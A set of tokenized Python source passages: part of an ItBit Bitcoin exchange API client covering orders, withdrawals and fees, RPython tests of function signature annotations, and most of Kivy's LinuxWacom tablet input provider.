req<block_start>response=self.resp(req)<line_sep>raw_balances=response['balances']<line_sep>btc_available=<none><line_sep>usd_available=<none><for_stmt>raw_balance raw_balances<block_start><if_stmt>raw_balance['currency']<eq>'XBT'<block_start>btc_available=Money(raw_balance['availableBalance'] 'BTC')<block_end><elif_stmt>raw_balance['currency']<eq>'USD'<block_start>usd_available=Money(raw_balance['availableBalance'] 'USD')<block_end><block_end><if_stmt>btc_available<is><none><or>usd_available<is><none><block_start><raise>exceptions.ExchangeAPIErrorException(self 'missing expected balances' )<block_end>balance=Balance()<line_sep>balance['BTC']=btc_available<line_sep>balance['USD']=usd_available<line_sep><return>balance<block_end><def_stmt>get_ticker_req self verify=<true><block_start><return>self.req('get' '/markets/XBTUSD/ticker' no_auth=<true> verify=verify )<block_end><def_stmt>get_ticker_resp self req<block_start>response=self.resp(req)<line_sep><return>{'high':Money(response['high24h'] 'USD') 'low':Money(response['low24h'] 'USD') 'last':Money(response['lastPrice'] 'USD') 'volume':Money(response['volume24h'] 'BTC')}<block_end><def_stmt>_get_orderbook_from_api_req self verify=<true><block_start><return>self.req('get' '/markets/XBTUSD/order_book' no_auth=<true> verify=verify )<block_end><def_stmt>place_order_req self mode volume price=<none> order_type=order_types.LIMIT_ORDER<block_start>side=self._order_mode_from_const(mode)<if_stmt>price.currency<ne>'USD'<block_start><raise>ValueError('price must be in USD')<block_end><if_stmt>volume.currency<ne>'BTC'<block_start><raise>ValueError('volume must be in BTC')<block_end># Truncate the volume instead of rounding it because it's better# to trade too # little than too much. 
volume=volume.round_to_decimal_places(8 rounding=cdecimal.ROUND_DOWN)<line_sep>volume_str='%.8f'%volume.amount<line_sep>price_str='%.2f'%price.amount<line_sep>payload={'type':'limit' 'currency':'XBT' 'side':side 'amount':volume_str 'price':price_str 'instrument':'XBTUSD'}<line_sep><return>self.req('post' '/wallets/%s/orders/'%self.wallet_id data=payload )<block_end><def_stmt>place_order_resp self req<block_start>response=self.resp(req)<try_stmt><block_start>order_id=str(response['id'])<line_sep><return>{'success':<true> 'order_id':order_id}<block_end><except_stmt>KeyError<block_start><raise>exceptions.ExchangeAPIErrorException(self 'response does not contain an order id' )<block_end><block_end><def_stmt>get_open_orders_req self<block_start><return>self.all_orders_req(status='open')<block_end><def_stmt>get_open_orders_resp self req<block_start>open_orders=self.all_orders_resp(req)<for_stmt>o open_orders<block_start><del_stmt>o['status']<block_end><return>open_orders<block_end><def_stmt>get_order_details self order_id<block_start>req=self.get_order_details_req()<line_sep><return>self.get_order_details_resp(req order_id)<block_end><def_stmt>get_order_details_req self<block_start><return>self.get_multi_order_details_req()<block_end><def_stmt>get_order_details_resp self req order_id<block_start><return>self.get_multi_order_details_resp(req [order_id])[order_id]<block_end><def_stmt>get_multi_order_details self order_ids<block_start>req=self.get_multi_order_details_req()<line_sep><return>self.get_multi_order_details_resp(req order_ids)<block_end><def_stmt>get_multi_order_details_req self<block_start><return>self.trades_for_orders_req()<block_end><def_stmt>get_multi_order_details_resp self req order_ids# This is modeled after Bitstamp, where we get the order details from the # trades endpoint directly. The caveat is that order_details will only work # for the most recent 50 trades. 
Since we are always accounting trades right # after they happen, this should be ok (and also affects Bitstamp). <block_start>order_ids=[str(o)<for>o order_ids]<line_sep>multi_trades=self.trades_for_orders_resp(req order_ids)<line_sep>data={}<for_stmt>order_id order_ids<block_start>total_usd=Money('0' 'USD')<line_sep>total_btc=Money('0' 'BTC')<line_sep>our_trades=[]<line_sep>our_type=<none><if_stmt>order_id<in>multi_trades<block_start>trades=multi_trades[order_id]<for_stmt>t trades<block_start><assert_stmt>(t['currency1']<eq>'XBT')<line_sep>btc_amount=Money(t['currency1Amount'] 'BTC')<assert_stmt>(t['currency2']<eq>'USD')<line_sep>usd_amount=Money(t['currency2Amount'] 'USD')<line_sep># This might also come back as XBT, but since ItBit has 0-fee # trading right now, I can't tell. <assert_stmt>(t['commissionCurrency']<eq>'USD')<line_sep>fee=Money(t['commissionPaid'] 'USD')<line_sep>total_usd<augadd>usd_amount<line_sep>total_btc<augadd>btc_amount<line_sep>our_type=self._order_mode_to_const(t['direction'])<line_sep>our_trades.append({'time':parse(t['timestamp']).epoch 'trade_id':<none> 'fee':fee 'btc':btc_amount 'fiat':usd_amount })<block_end><block_end>time_created=<none><if_stmt>our_trades<block_start>time_created=min([t['time']<for>t our_trades])<block_end>data[order_id]={'time_created':time_created 'type':our_type 'btc_total':total_btc 'fiat_total':total_usd 'trades':our_trades}<block_end><return>data<block_end><def_stmt>cancel_order_req self order_id<block_start><return>self.req('delete' '/wallets/%s/orders/%s'%(self.wallet_id order_id) )<block_end><def_stmt>cancel_order_resp self req# In the success case, no response is given but we need to call resp() so it # can catch any error cases. 
<block_start>response=self.resp(req)# noqa <return>{'success':<true>}<block_end><def_stmt>withdraw_crypto_req self address volume<block_start><if_stmt><not>isinstance(address basestring)<block_start><raise>TypeError('Withdrawal address must be a string')<block_end><if_stmt><not>isinstance(volume Money)<or>volume.currency<ne>self.volume_currency<block_start><raise>TypeError('Withdrawal volume must be in %s'%self.volume_currency)<block_end>volume_str='%.8f'%volume.amount<line_sep>payload={'currency':'XBT' 'amount':volume_str 'address':address }<line_sep><return>self.req('post' '/wallets/%s/cryptocurrency_withdrawals'%self.wallet_id data=payload )<block_end><def_stmt>withdraw_crypto_resp self req<block_start>response=self.resp(req)<line_sep><return>{'success':<true> 'exchange_withdrawal_id':response['withdrawalId']}<block_end><def_stmt>get_order_audit_data self skip_recent=0 page=1<block_start>""" Returns an OrderedDict of order ids mapped to their filled volume (only include orders that have some trades). Dropped the skip_recent flag because we don't seem to be using it anywhere. """<if_stmt>skip_recent<ne>0<block_start><raise>ValueEror('skip_recent is deprecated')<block_end>orders=OrderedDict()<line_sep>trades_to_audit=self.all_trades(page=page)<for_stmt>trade trades_to_audit<block_start>order_id=str(trade['orderId'])<assert_stmt>(trade['currency1']<eq>'XBT')<line_sep>trade_amount=abs(Money(trade['currency1Amount'] 'BTC'))<try_stmt><block_start>orders[order_id]<augadd>trade_amount<block_end><except_stmt>KeyError<block_start>orders[order_id]=trade_amount<block_end><block_end># Remove the oldest 2 orders, because its trades might be wrapped around a # page gap and this would give us an innacurate volume_filled number. # We need to remove 2 because there could be an ask and a bid. 
<try_stmt><block_start>orders.popitem()<line_sep>orders.popitem()<block_end><except_stmt>KeyError<block_start><pass><block_end><return>orders<block_end><def_stmt>fiat_deposit_fee self deposit_amount<block_start><return>Money('5' 'USD')<block_end><def_stmt>fiat_withdrawal_fee self withdrawal_amount<block_start>""" Itbit fee is from their documentation, and an extra $15 is being charged to us before it shows up in our bank account (as of the September 2016), so I assume that's an intermediary fee. The fee should be a flat $50 on withdrawals > $10k, but we'll see. """<line_sep>fee=Money('0' 'USD')<if_stmt>withdrawal_amount<l>Money('10,000' 'USD')<block_start>itbit_fee=Money('15' 'USD')<line_sep>intermediary_fee=Money('15' 'USD')<line_sep>fee=itbit_fee+intermediary_fee<block_end><else_stmt><block_start>fee=Money('50' 'USD')<block_end><return>fee<block_end><block_end>
<import_stmt>py<import_from_stmt>rpython.rlib.signature signature finishsigs FieldSpec ClassSpec<import_from_stmt>rpython.rlib types<import_from_stmt>rpython.annotator model<import_from_stmt>rpython.rtyper.llannotation SomePtr<import_from_stmt>rpython.annotator.signature SignatureError<import_from_stmt>rpython.translator.translator TranslationContext graphof<import_from_stmt>rpython.rtyper.lltypesystem rstr<import_from_stmt>rpython.rtyper.annlowlevel LowLevelAnnotatorPolicy<def_stmt>annotate_at f policy=<none><block_start>t=TranslationContext()<line_sep>t.config.translation.check_str_without_nul=<true><line_sep>a=t.buildannotator(policy=policy)<line_sep>a.annotate_helper(f [model.s_ImpossibleValue]<times>f.__code__.co_argcount policy=policy)<line_sep><return>a<block_end><def_stmt>sigof a f# returns [param1, param2, ..., ret] <block_start>g=graphof(a.translator f)<line_sep><return>[a.binding(v)<for>v g.startblock.inputargs]+[a.binding(g.getreturnvar())]<block_end><def_stmt>getsig f policy=<none><block_start>a=annotate_at(f policy=policy)<line_sep><return>sigof(a f)<block_end><def_stmt>check_annotator_fails caller<block_start>exc=py.test.raises(model.AnnotatorError annotate_at caller).value<assert_stmt>caller.__name__<in>str(exc)<block_end><def_stmt>test_bookkeeping <block_start>@signature('x' 'y' returns='z')<def_stmt>f a b<block_start><return>a+len(b)<block_end>f.foo='foo'<assert_stmt>f._signature_<eq>(('x' 'y') 'z')<assert_stmt>f.__name__<eq>'f'<assert_stmt>f.foo<eq>'foo'<assert_stmt>f(1 'hello')<eq>6<block_end><def_stmt>test_basic <block_start>@signature(types.int() types.str() returns=types.char())<def_stmt>f a b<block_start><return>b[a]<block_end><assert_stmt>getsig(f)<eq>[model.SomeInteger() model.SomeString() model.SomeChar()]<block_end><def_stmt>test_arg_errors <block_start>@signature(types.int() types.str() returns=types.int())<def_stmt>f a b<block_start><return>a+len(b)<block_end>@check_annotator_fails<def_stmt>ok_for_body # would give no error without 
signature <block_start>f(2.0 'b')<block_end>@check_annotator_fails<def_stmt>bad_for_body # would give error inside 'f' body, instead errors at call <block_start>f('a' 'b')<block_end><block_end><def_stmt>test_return <block_start>@signature(returns=types.str())<def_stmt>f <block_start><return>'a'<block_end><assert_stmt>getsig(f)<eq>[model.SomeString()]<line_sep>@signature(types.str() returns=types.str())<def_stmt>f x<block_start><return>x<block_end><def_stmt>g <block_start><return>f('a')<block_end>a=annotate_at(g)<assert_stmt>sigof(a f)<eq>[model.SomeString() model.SomeString()]<block_end><def_stmt>test_return_errors <block_start>@check_annotator_fails@signature(returns=types.int())<def_stmt>int_not_char <block_start><return>'a'<block_end>@check_annotator_fails@signature(types.str() returns=types.int())<def_stmt>str_to_int s<block_start><return>s<block_end>@signature(returns=types.str())<def_stmt>str_not_None <block_start><return><none><block_end>@check_annotator_fails<def_stmt>caller_of_str_not_None <block_start><return>str_not_None()<block_end><block_end>@py.test.mark.xfail<def_stmt>test_return_errors_xfail <block_start>@check_annotator_fails@signature(returns=types.str())<def_stmt>str_not_None <block_start><return><none><block_end><block_end><def_stmt>test_none <block_start>@signature(returns=types.none())<def_stmt>f <block_start><pass><block_end><assert_stmt>getsig(f)<eq>[model.s_None]<block_end><def_stmt>test_float <block_start>@signature(types.longfloat() types.singlefloat() returns=types.float())<def_stmt>f a b<block_start><return>3.0<block_end><assert_stmt>getsig(f)<eq>[model.SomeLongFloat() model.SomeSingleFloat() model.SomeFloat()]<block_end><def_stmt>test_unicode <block_start>@signature(types.unicode() returns=types.int())<def_stmt>f u<block_start><return>len(u)<block_end><assert_stmt>getsig(f)<eq>[model.SomeUnicodeString() model.SomeInteger()]<block_end><def_stmt>test_str0 <block_start>@signature(types.unicode0() returns=types.str0())<def_stmt>f 
u<block_start><return>'str'<block_end><assert_stmt>getsig(f)<eq>[model.SomeUnicodeString(no_nul=<true>) model.SomeString(no_nul=<true>)]<block_end><def_stmt>test_ptr <block_start>policy=LowLevelAnnotatorPolicy()<line_sep>@signature(types.ptr(rstr.STR) returns=types.none())<def_stmt>f buf<block_start><pass><block_end>argtype=getsig(f policy=policy)[0]<assert_stmt>isinstance(argtype SomePtr)<assert_stmt>argtype.ll_ptrtype.TO<eq>rstr.STR<def_stmt>g <block_start>f(rstr.mallocstr(10))<block_end>getsig(g policy=policy)<block_end><def_stmt>test_list <block_start>@signature(types.list(types.int()) returns=types.int())<def_stmt>f a<block_start><return>len(a)<block_end>argtype=getsig(f)[0]<assert_stmt>isinstance(argtype model.SomeList)<line_sep>item=argtype.listdef.listitem<assert_stmt>item.s_value<eq>model.SomeInteger()<assert_stmt>item.resized<eq><true><line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(['a'])<block_end>@check_annotator_fails<def_stmt>bad_for_body <block_start>f('a')<block_end>@signature(returns=types.list(types.char()))<def_stmt>ff <block_start><return>['a']<block_end>@check_annotator_fails<def_stmt>mutate_broader <block_start>ff()[0]='abc'<block_end>@check_annotator_fails<def_stmt>mutate_unrelated <block_start>ff()[0]=1<block_end>@check_annotator_fails@signature(types.list(types.char()) returns=types.int())<def_stmt>mutate_in_body l<block_start>l[0]='abc'<line_sep><return>len(l)<block_end><def_stmt>can_append <block_start>l=ff()<line_sep>l.append('b')<block_end>getsig(can_append)<block_end><def_stmt>test_array <block_start>@signature(returns=types.array(types.int()))<def_stmt>f <block_start><return>[1]<block_end>rettype=getsig(f)[0]<assert_stmt>isinstance(rettype model.SomeList)<line_sep>item=rettype.listdef.listitem<assert_stmt>item.s_value<eq>model.SomeInteger()<assert_stmt>item.resized<eq><false><def_stmt>try_append <block_start>l=f()<line_sep>l.append(2)<block_end>check_annotator_fails(try_append)<block_end><def_stmt>test_dict 
<block_start>@signature(returns=types.dict(types.str() types.int()))<def_stmt>f <block_start><return>{'a':1 'b':2}<block_end>rettype=getsig(f)[0]<assert_stmt>isinstance(rettype model.SomeDict)<assert_stmt>rettype.dictdef.dictkey.s_value<eq>model.SomeString()<assert_stmt>rettype.dictdef.dictvalue.s_value<eq>model.SomeInteger()<block_end><def_stmt>test_instance <block_start><class_stmt>C1(object)<block_start><pass><block_end><class_stmt>C2(C1)<block_start><pass><block_end><class_stmt>C3(C2)<block_start><pass><block_end>@signature(types.instance(C3) returns=types.instance(C2))<def_stmt>f x<block_start><assert_stmt>isinstance(x C2)<line_sep><return>x<block_end>argtype,rettype=getsig(f)<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C3<assert_stmt>isinstance(rettype model.SomeInstance)<assert_stmt>rettype.classdef.classdesc.pyobj<eq>C2<line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(C2())<block_end>@check_annotator_fails<def_stmt>bad_for_body <block_start>f(C1())<block_end>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(<none>)<block_end><block_end><def_stmt>test_instance_or_none <block_start><class_stmt>C1(object)<block_start><pass><block_end><class_stmt>C2(C1)<block_start><pass><block_end><class_stmt>C3(C2)<block_start><pass><block_end>@signature(types.instance(C3 can_be_None=<true>) returns=types.instance(C2 can_be_None=<true>))<def_stmt>f x<block_start><assert_stmt>isinstance(x C2)<or>x<is><none><line_sep><return>x<block_end>argtype,rettype=getsig(f)<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C3<assert_stmt>argtype.can_be_None<assert_stmt>isinstance(rettype model.SomeInstance)<assert_stmt>rettype.classdef.classdesc.pyobj<eq>C2<assert_stmt>rettype.can_be_None<line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(C2())<block_end>@check_annotator_fails<def_stmt>bad_for_body 
<block_start>f(C1())<block_end><block_end><def_stmt>test_self <block_start>@finishsigs<class_stmt>C(object)<block_start>@signature(types.self() types.self() returns=types.none())<def_stmt>f self other<block_start><pass><block_end><block_end><class_stmt>D1(C)<block_start><pass><block_end><class_stmt>D2(C)<block_start><pass><block_end><def_stmt>g <block_start>D1().f(D2())<block_end>a=annotate_at(g)<line_sep>argtype=sigof(a C.__dict__['f'])[0]<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C<block_end><def_stmt>test_self_error <block_start><class_stmt>C(object)<block_start>@signature(types.self() returns=types.none())<def_stmt>incomplete_sig_meth self<block_start><pass><block_end><block_end>exc=py.test.raises(SignatureError annotate_at C.incomplete_sig_meth).value<assert_stmt>'incomplete_sig_meth'<in>str(exc)<assert_stmt>'finishsigs'<in>str(exc)<block_end><def_stmt>test_any_as_argument <block_start>@signature(types.any() types.int() returns=types.float())<def_stmt>f x y<block_start><return>x+y<block_end>@signature(types.int() returns=types.float())<def_stmt>g x<block_start><return>f(x x)<block_end>sig=getsig(g)<assert_stmt>sig<eq>[model.SomeInteger() model.SomeFloat()]<line_sep>@signature(types.float() returns=types.float())<def_stmt>g x<block_start><return>f(x 4)<block_end>sig=getsig(g)<assert_stmt>sig<eq>[model.SomeFloat() model.SomeFloat()]<line_sep>@signature(types.str() returns=types.int())<def_stmt>cannot_add_string x<block_start><return>f(x 2)<block_end>exc=py.test.raises(model.AnnotatorError annotate_at cannot_add_string).value<assert_stmt>'Blocked block'<in>str(exc)<block_end><def_stmt>test_return_any <block_start>@signature(types.int() returns=types.any())<def_stmt>f x<block_start><return>x<block_end>sig=getsig(f)<assert_stmt>sig<eq>[model.SomeInteger() model.SomeInteger()]<line_sep>@signature(types.str() returns=types.any())<def_stmt>cannot_add_string 
x<block_start><return>f(3)+x<block_end>exc=py.test.raises(model.AnnotatorError annotate_at cannot_add_string).value<assert_stmt>'Blocked block'<in>str(exc)<assert_stmt>'cannot_add_string'<in>str(exc)<block_end>@py.test.mark.xfail<def_stmt>test_class_basic <block_start><class_stmt>C(object)<block_start>_fields_=ClassSpec({'x':FieldSpec(types.int)})<block_end><def_stmt>wrong_type <block_start>c=C()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type)<def_stmt>bad_field <block_start>c=C()<line_sep>c.y=3<block_end>check_annotator_fails(bad_field)<block_end>@py.test.mark.xfail<def_stmt>test_class_shorthand <block_start><class_stmt>C1(object)<block_start>_fields_={'x':FieldSpec(types.int)}<block_end><def_stmt>wrong_type_1 <block_start>c=C1()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type_1)<class_stmt>C2(object)<block_start>_fields_=ClassSpec({'x':types.int})<block_end><def_stmt>wrong_type_2 <block_start>c=C2()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type_1)<block_end>@py.test.mark.xfail<def_stmt>test_class_inherit <block_start><class_stmt>C(object)<block_start>_fields_=ClassSpec({'x':FieldSpec(types.int)})<block_end><class_stmt>C1(object)<block_start>_fields_=ClassSpec({'y':FieldSpec(types.int)})<block_end><class_stmt>C2(object)<block_start>_fields_=ClassSpec({'y':FieldSpec(types.int)} inherit=<true>)<block_end><def_stmt>no_inherit <block_start>c=C1()<line_sep>c.x=3<block_end>check_annotator_fails(no_inherit)<def_stmt>good <block_start>c=C2()<line_sep>c.x=3<block_end>annotate_at(good)<def_stmt>wrong_type <block_start>c=C2()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type)<block_end>
''' Native support of Wacom tablet from linuxwacom driver ===================================================== To configure LinuxWacom, add this to your configuration:: [input] pen = linuxwacom,/dev/input/event2,mode=pen finger = linuxwacom,/dev/input/event3,mode=touch .. note:: You must have read access to the input event. You can use a custom range for the X, Y and pressure values. On some drivers, the range reported is invalid. To fix that, you can add these options to the argument line: * invert_x : 1 to invert X axis * invert_y : 1 to invert Y axis * min_position_x : X minimum * max_position_x : X maximum * min_position_y : Y minimum * max_position_y : Y maximum * min_pressure : pressure minimum * max_pressure : pressure maximum '''<line_sep>__all__=('LinuxWacomMotionEventProvider' 'LinuxWacomMotionEvent')<import_stmt>os<import_from_stmt>kivy.input.motionevent MotionEvent<import_from_stmt>kivy.input.shape ShapeRect<class_stmt>LinuxWacomMotionEvent(MotionEvent)<block_start><def_stmt>depack self args<block_start>self.is_touch=<true><line_sep>self.sx=args['x']<line_sep>self.sy=args['y']<line_sep>self.profile=['pos']<if_stmt>'size_w'<in>args<and>'size_h'<in>args<block_start>self.shape=ShapeRect()<line_sep>self.shape.width=args['size_w']<line_sep>self.shape.height=args['size_h']<line_sep>self.profile.append('shape')<block_end><if_stmt>'pressure'<in>args<block_start>self.pressure=args['pressure']<line_sep>self.profile.append('pressure')<block_end>super(LinuxWacomMotionEvent self).depack(args)<block_end><def_stmt>__str__ self<block_start><return>'<LinuxWacomMotionEvent id=%d pos=(%f, %f) device=%s>'%(self.id self.sx self.sy self.device)<block_end><block_end><if_stmt>'KIVY_DOC'<in>os.environ# documentation hack <block_start>LinuxWacomMotionEventProvider=<none><block_end><else_stmt><block_start><import_stmt>threading<import_stmt>collections<import_stmt>struct<import_stmt>fcntl<import_from_stmt>kivy.input.provider MotionEventProvider<import_from_stmt>kivy.input.factory 
MotionEventFactory<import_from_stmt>kivy.logger Logger<line_sep># # This part is taken from linux-source-2.6.32/include/linux/input.h # # Event types EV_SYN=0x00<line_sep>EV_KEY=0x01<line_sep>EV_REL=0x02<line_sep>EV_ABS=0x03<line_sep>EV_MSC=0x04<line_sep>EV_SW=0x05<line_sep>EV_LED=0x11<line_sep>EV_SND=0x12<line_sep>EV_REP=0x14<line_sep>EV_FF=0x15<line_sep>EV_PWR=0x16<line_sep>EV_FF_STATUS=0x17<line_sep>EV_MAX=0x1f<line_sep>EV_CNT=(EV_MAX+1)<line_sep>KEY_MAX=0x2ff<line_sep># Synchronization events SYN_REPORT=0<line_sep>SYN_CONFIG=1<line_sep>SYN_MT_REPORT=2<line_sep># Misc events MSC_SERIAL=0x00<line_sep>MSC_PULSELED=0x01<line_sep>MSC_GESTURE=0x02<line_sep>MSC_RAW=0x03<line_sep>MSC_SCAN=0x04<line_sep>MSC_MAX=0x07<line_sep>MSC_CNT=(MSC_MAX+1)<line_sep>ABS_X=0x00<line_sep>ABS_Y=0x01<line_sep>ABS_PRESSURE=0x18<line_sep>ABS_MISC=0x28# if 0, it's touch up ABS_MT_TOUCH_MAJOR=0x30# Major axis of touching ellipse ABS_MT_TOUCH_MINOR=0x31# Minor axis (omit if circular) ABS_MT_WIDTH_MAJOR=0x32# Major axis of approaching ellipse ABS_MT_WIDTH_MINOR=0x33# Minor axis (omit if circular) ABS_MT_ORIENTATION=0x34# Ellipse orientation ABS_MT_POSITION_X=0x35# Center X ellipse position ABS_MT_POSITION_Y=0x36# Center Y ellipse position ABS_MT_TOOL_TYPE=0x37# Type of touching device ABS_MT_BLOB_ID=0x38# Group a set of packets as a blob ABS_MT_TRACKING_ID=0x39# Unique ID of initiated contact ABS_MT_PRESSURE=0x3a# Pressure on contact area # some ioctl base (with 0 value) EVIOCGNAME=2147501318<line_sep>EVIOCGBIT=2147501344<line_sep>EVIOCGABS=2149074240<line_sep># sizeof(struct input_event) struct_input_event_sz=struct.calcsize('LLHHi')<line_sep>struct_input_absinfo_sz=struct.calcsize('iiiiii')<line_sep>sz_l=struct.calcsize('Q')<class_stmt>LinuxWacomMotionEventProvider(MotionEventProvider)<block_start>options=('min_position_x' 'max_position_x' 'min_position_y' 'max_position_y' 'min_pressure' 'max_pressure' 'invert_x' 'invert_y')<def_stmt>__init__ self device 
args<block_start>super(LinuxWacomMotionEventProvider self).__init__(device args)<line_sep>self.input_fn=<none><line_sep>self.default_ranges=dict()<line_sep>self.mode='touch'<line_sep># split arguments args=args.split(',')<if_stmt><not>args<block_start>Logger.error('LinuxWacom: No filename given in config')<line_sep>Logger.error('LinuxWacom: Use /dev/input/event0 for example')<line_sep><return><block_end># read filename self.input_fn=args[0]<line_sep>Logger.info('LinuxWacom: Read event from <%s>'%self.input_fn)<line_sep># read parameters <for_stmt>arg args[1:]<block_start><if_stmt>arg<eq>''<block_start><continue><block_end>arg=arg.split('=')<line_sep># ensure it's a key = value <if_stmt>len(arg)<ne>2<block_start>err='LinuxWacom: Bad parameter'<concat>'%s: Not in key=value format.'%arg<line_sep>Logger.error(err)<line_sep><continue><block_end># ensure the key exist key,value=arg<if_stmt>key<eq>'mode'<block_start>self.mode=value<line_sep><continue><block_end><if_stmt>key<not><in>LinuxWacomMotionEventProvider.options<block_start>Logger.error('LinuxWacom: unknown %s option'%key)<line_sep><continue><block_end># ensure the value <try_stmt><block_start>self.default_ranges[key]=int(value)<block_end><except_stmt>ValueError<block_start>err='LinuxWacom: value %s invalid for %s'%(key value)<line_sep>Logger.error(err)<line_sep><continue><block_end># all good! 
msg='LinuxWacom: Set custom %s to %d'%(key int(value))<line_sep>Logger.info(msg)<block_end>Logger.info('LinuxWacom: mode is <%s>'%self.mode)<block_end><def_stmt>start self<block_start><if_stmt>self.input_fn<is><none><block_start><return><block_end>self.uid=0<line_sep>self.queue=collections.deque()<line_sep>self.thread=threading.Thread(target=self._thread_run kwargs=dict(queue=self.queue input_fn=self.input_fn device=self.device default_ranges=self.default_ranges))<line_sep>self.thread.daemon=<true><line_sep>self.thread.start()<block_end><def_stmt>_thread_run self **kwargs<block_start>input_fn=kwargs.get('input_fn')<line_sep>queue=kwargs.get('queue')<line_sep>device=kwargs.get('device')<line_sep>drs=kwargs.get('default_ranges').get<line_sep>touches={}<line_sep>touches_sent=[]<line_sep>l_points={}<line_sep># prepare some vars to get limit of some component range_min_position_x=0<line_sep>range_max_position_x=2048<line_sep>range_min_position_y=0<line_sep>range_max_position_y=2048<line_sep>range_min_pressure=0<line_sep>range_max_pressure=255<line_sep>invert_x=int(bool(drs('invert_x' 0)))<line_sep>invert_y=int(bool(drs('invert_y' 0)))<line_sep>reset_touch=<false><def_stmt>process points<block_start>actives=list(points.keys())<for_stmt>args points.values()<block_start>tid=args['id']<try_stmt><block_start>touch=touches[tid]<block_end><except_stmt>KeyError<block_start>touch=LinuxWacomMotionEvent(device tid args)<line_sep>touches[touch.id]=touch<block_end><if_stmt>touch.sx<eq>args['x']<and>touch.sy<eq>args['y']<and>tid<in>touches_sent<block_start><continue><block_end>touch.move(args)<if_stmt>tid<not><in>touches_sent<block_start>queue.append(('begin' touch))<line_sep>touches_sent.append(tid)<block_end>queue.append(('update' touch))<block_end><for_stmt>tid list(touches.keys())[:]<block_start><if_stmt>tid<not><in>actives<block_start>touch=touches[tid]<if_stmt>tid<in>touches_sent<block_start>touch.update_time_end()<line_sep>queue.append(('end' 
touch))<line_sep>touches_sent.remove(tid)<block_end><del_stmt>touches[tid]<block_end><block_end><block_end><def_stmt>normalize value vmin vmax<block_start><return>(value-vmin)/float(vmax-vmin)<block_end># open the input <try_stmt><block_start>fd=open(input_fn 'rb')<block_end><except_stmt>IOError<block_start>Logger.exception('Unable to open %s'%input_fn)<line_sep><return><block_end># get the controller name (EVIOCGNAME) device_name=fcntl.ioctl(fd EVIOCGNAME+(256<lshift>16) " "<times>256).split('\x00')[0]<line_sep>Logger.info('LinuxWacom: using <%s>'%device_name)<line_sep># get abs infos bit=fcntl.ioctl(fd EVIOCGBIT+(EV_MAX<lshift>16) ' '<times>sz_l)<line_sep>bit,=struct.unpack('Q' bit)<for_stmt>x range(EV_MAX)# preserve this, we may want other things than EV_ABS <block_start><if_stmt>x<ne>EV_ABS<block_start><continue><block_end># EV_ABS available for this device ? <if_stmt>(bit&(1<lshift>x))<eq>0<block_start><continue><block_end># ask abs info keys to the devices sbit=fcntl.ioctl(fd EVIOCGBIT+x+(KEY_MAX<lshift>16) ' '<times>sz_l)<line_sep>sbit,=struct.unpack('Q' sbit)<for_stmt>y range(KEY_MAX)<block_start><if_stmt>(sbit&(1<lshift>y))<eq>0<block_start><continue><block_end>absinfo=fcntl.ioctl(fd EVIOCGABS+y+(struct_input_absinfo_sz<lshift>16) ' '<times>struct_input_absinfo_sz)<line_sep>abs_value,abs_min,abs_max,abs_fuzz,abs_flat,abs_res=struct.unpack('iiiiii' absinfo)<if_stmt>y<eq>ABS_X<block_start>range_min_position_x=drs('min_position_x' abs_min)<line_sep>range_max_position_x=drs('max_position_x' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range position X is %d - %d'%(device_name abs_min abs_max))<block_end><elif_stmt>y<eq>ABS_Y<block_start>range_min_position_y=drs('min_position_y' abs_min)<line_sep>range_max_position_y=drs('max_position_y' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range position Y is %d - %d'%(device_name abs_min abs_max))<block_end><elif_stmt>y<eq>ABS_PRESSURE<block_start>range_min_pressure=drs('min_pressure' 
abs_min)<line_sep>range_max_pressure=drs('max_pressure' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range pressure is %d - %d'%(device_name abs_min abs_max))<block_end><block_end><block_end># read until the end changed=<false><line_sep>touch_id=0<line_sep>touch_x=0<line_sep>touch_y=0<line_sep>touch_pressure=0<while_stmt>fd<block_start>data=fd.read(struct_input_event_sz)<if_stmt>len(data)<l>struct_input_event_sz<block_start><break><block_end># extract each event <for_stmt>i range(len(data)/struct_input_event_sz)<block_start>ev=data[i<times>struct_input_event_sz:]<line_sep># extract timeval + event infos tv_sec,tv_usec,ev_type,ev_code,ev_value=struct.unpack('LLHHi' ev[:struct_input_event_sz])<if_stmt>ev_type<eq>EV_SYN<and>ev_code<eq>SYN_REPORT<block_start><if_stmt>touch_id<in>l_points<block_start>p=l_points[touch_id]<block_end><else_stmt><block_start>p=dict()<line_sep>l_points[touch_id]=p<block_end>p['id']=touch_id<if_stmt><not>reset_touch<block_start>p['x']=touch_x<line_sep>p['y']=touch_y<line_sep>p['pressure']=touch_pressure<block_end><if_stmt>self.mode<eq>'pen'<and>touch_pressure<eq>0<and><not>reset_touch<block_start><del_stmt>l_points[touch_id]<block_end><if_stmt>changed<block_start><if_stmt>'x'<not><in>p<block_start>reset_touch=<false><line_sep><continue><block_end>process(l_points)<line_sep>changed=<false><block_end><if_stmt>reset_touch<block_start>l_points.clear()<line_sep>reset_touch=<false><line_sep>process(l_points)<block_end><block_end><elif_stmt>ev_type<eq>EV_MSC<and>ev_code<eq>MSC_SERIAL<block_start>touch_id=ev_value<block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_X<block_start>val=normalize(ev_value range_min_position_x range_max_position_x)<if_stmt>invert_x<block_start>val=1.-val<block_end>touch_x=val<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_Y<block_start>val=1.-normalize(ev_value range_min_position_y 
